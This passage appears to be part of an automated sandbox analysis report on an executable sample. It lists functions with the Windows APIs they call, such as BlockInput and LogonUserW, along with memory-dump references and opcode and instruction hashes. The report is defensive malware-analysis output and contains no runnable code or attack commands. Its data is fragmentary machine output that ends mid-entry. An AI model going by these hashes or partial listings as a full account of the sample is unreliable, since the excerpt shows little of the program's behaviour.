                                                                                                                • API ID: ExceptionFilterUnhandled$FileModuleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 787209826-0
                                                                                                                • Opcode ID: 1cbe704d86881204e8361e37842e1f13b131521e911a6f4d35389fdffc169e2d
                                                                                                                • Instruction ID: 9d34c63210c516c804ddbcbce3c521aa4eb8bf6faa5e2c9a58dfeebf86138d69
                                                                                                                • Opcode Fuzzy Hash: 1cbe704d86881204e8361e37842e1f13b131521e911a6f4d35389fdffc169e2d
                                                                                                                • Instruction Fuzzy Hash: 2C21E67091132D9ACB21EF659D897C9BBB8AF18704F1040EBA50CA6261DB789FC58F58
                                                                                                                Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0vH$HH
                                                                                                                • API String ID: 0-728391547
                                                                                                                • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                Function 04547000 Relevance: 2.2, Strings: 1, Instructions: 958COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %
                                                                                                                • API String ID: 0-2567322570
                                                                                                                • Opcode ID: ad9d9e4ed856bbc1a1f5a44e896685112ab95b057e4e2b96676990c2cb68e2ac
                                                                                                                • Instruction ID: 2fa34336e9ef0fe885d9d5dd6ffb055e1532136e8e970563a654dda37c491d5c
                                                                                                                • Opcode Fuzzy Hash: ad9d9e4ed856bbc1a1f5a44e896685112ab95b057e4e2b96676990c2cb68e2ac
                                                                                                                • Instruction Fuzzy Hash: 54829C708083458FDB558F34C898AC9BB71FF8A324F15C1EAC4489F667D3385A86DBA5
                                                                                                                Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2346855178-0
                                                                                                                • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                Function 00427161 Relevance: 1.9, Strings: 1, Instructions: 608COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 3gB
                                                                                                                • API String ID: 0-1795317511
                                                                                                                • Opcode ID: 6da754253abd2e35eb2e5a274ee4f9ff3dc2e5057a81817226e1356d575d6b11
                                                                                                                • Instruction ID: 325a13a96c06d4c98cee853255adfbe26994b6972aee23e03a37be849d38a260
                                                                                                                • Opcode Fuzzy Hash: 6da754253abd2e35eb2e5a274ee4f9ff3dc2e5057a81817226e1356d575d6b11
                                                                                                                • Instruction Fuzzy Hash: 25228B31E08229CBDF24CFA8E4503EDBBB1FB55314FA4816BD841AB385D7785882DB59
                                                                                                                Function 0041D750 Relevance: 1.8, APIs: 1, Instructions: 266COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,?,?,0041DA4A,?,?,?,?,?,0041DDE3,00000000), ref: 0041D974
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: 3e752bb449efab522d3200141cf3dcee0c6bb4a1b97e107f9c0d62f6c5d4ee43
                                                                                                                • Instruction ID: 72ef4f9e9c7a35c4269090967bf6b9d23df6b64c3bcfe04dbdb27e9d628d6ebd
                                                                                                                • Opcode Fuzzy Hash: 3e752bb449efab522d3200141cf3dcee0c6bb4a1b97e107f9c0d62f6c5d4ee43
                                                                                                                • Instruction Fuzzy Hash: D0B191B1A10609CFDB18DF18C496AA67BE0FF44354F19865EE99A8F3E1C738D981CB44
                                                                                                                Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                Function 0043916A Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                Function 004711D2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                Function 0042202E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                Function 00443390 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem
                                                                                                                • String ID: rJ
                                                                                                                • API String ID: 2086374402-1865492326
                                                                                                                • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                Function 00443391 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem
                                                                                                                • String ID: rJ
                                                                                                                • API String ID: 2086374402-1865492326
                                                                                                                • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                Function 0040F890 Relevance: .6, Instructions: 589COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                Function 00411B63 Relevance: .5, Instructions: 528COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8a3d5087dd20accb23969c3925dc540b0c919307cd436b6fa687a31edc4bc05f
                                                                                                                • Instruction ID: 587d2ccb264c520bda6fdd860f1d97339e5d8a8ab0720f255f163f1264fae3dc
                                                                                                                • Opcode Fuzzy Hash: 8a3d5087dd20accb23969c3925dc540b0c919307cd436b6fa687a31edc4bc05f
                                                                                                                • Instruction Fuzzy Hash: 7F02D133D497B34B8B314EF941E01A77EA05E0569130F47EADEC06F396C21ADD9A86E4
                                                                                                                Function 0042397B Relevance: .5, Instructions: 518COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea7ecdee6ac2e72654eecb9430e4f352bbd77c369f68d58dc27da5fc62acdc79
                                                                                                                • Instruction ID: 9e35f59c0add5ef17a89191b59ea5f5d96c4811c663926068cb485e9fd62b85b
                                                                                                                • Opcode Fuzzy Hash: ea7ecdee6ac2e72654eecb9430e4f352bbd77c369f68d58dc27da5fc62acdc79
                                                                                                                • Instruction Fuzzy Hash: 6802E932B105299BDF04CF69D4403ADB7B2FBD8316F65C67ED916A7290C3786A05CB84
                                                                                                                Function 00412C38 Relevance: .4, Instructions: 384COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction ID: b3f199f19983f506b623bfe7955a95149e6efe4e98ce3416cc40fa12ddcf4508
                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction Fuzzy Hash: 46D19073C0A9B30A8735812D42582BFEE626FD578131EC3E29CD07F38AD26B5DA195D4
                                                                                                                Function 00412818 Relevance: .4, Instructions: 378COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction ID: c47bdb3f9c9e38c5d46ddb9e43dedaf70276048770aeb58bd274f21c588a824b
                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction Fuzzy Hash: 1CD19073D1A9B30A8735852D42581AFEE626FD578031EC3E2CCD07F38AD16B5DA191D4
                                                                                                                Function 0041240C Relevance: .4, Instructions: 361COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
